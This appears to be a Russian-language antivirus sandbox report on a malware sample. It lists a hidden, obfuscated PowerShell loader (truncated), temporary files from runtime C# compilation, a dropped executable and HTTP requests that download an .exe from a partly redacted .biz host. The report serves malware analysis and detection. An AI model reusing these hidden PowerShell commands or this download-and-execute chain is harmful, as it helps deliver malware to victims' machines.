Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function r8dc5 {param($t3dce44)$b4c7268='y69ca';$lb65a7='';for ($i=0; $i -lt $t3dce44.length;$i+=2){$heb568=[convert]::ToByte($t3dce44.Substring($i,2),16);$lb65a7+=[char](...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\pps6dyv8.0.cs
- %TEMP%\pps6dyv8.cmdline
- %TEMP%\pps6dyv8.out
- %TEMP%\csc347a.tmp
- %TEMP%\res348b.tmp
- %TEMP%\pps6dyv8.dll
- %APPDATA%\aab37.exe
Удаляет следующие файлы
- %TEMP%\res348b.tmp
- %TEMP%\csc347a.tmp
- %TEMP%\pps6dyv8.0.cs
- %TEMP%\pps6dyv8.out
- %TEMP%\pps6dyv8.cmdline
- %TEMP%\pps6dyv8.dll
- %TEMP%\pps6dyv8.pdb
Сетевая активность
TCP
Запросы HTTP GET
- http://am###chi.biz/igbobueze.exe
- http://am###chi.biz/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK am###chi.biz
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function r8dc5 {param($t3dce44)$b4c7268='y69ca';$lb65a7='';for ($i=0; $i -lt $t3dce44.length;$i+=2){$heb568=[convert]::ToByte($t3dce44.Substring($i,2),16);$lb65a7+=[char](...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pps6dyv8.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES348B.tmp" "%TEMP%\CSC347A.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pps6dyv8.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES348B.tmp" "%TEMP%\CSC347A.tmp"
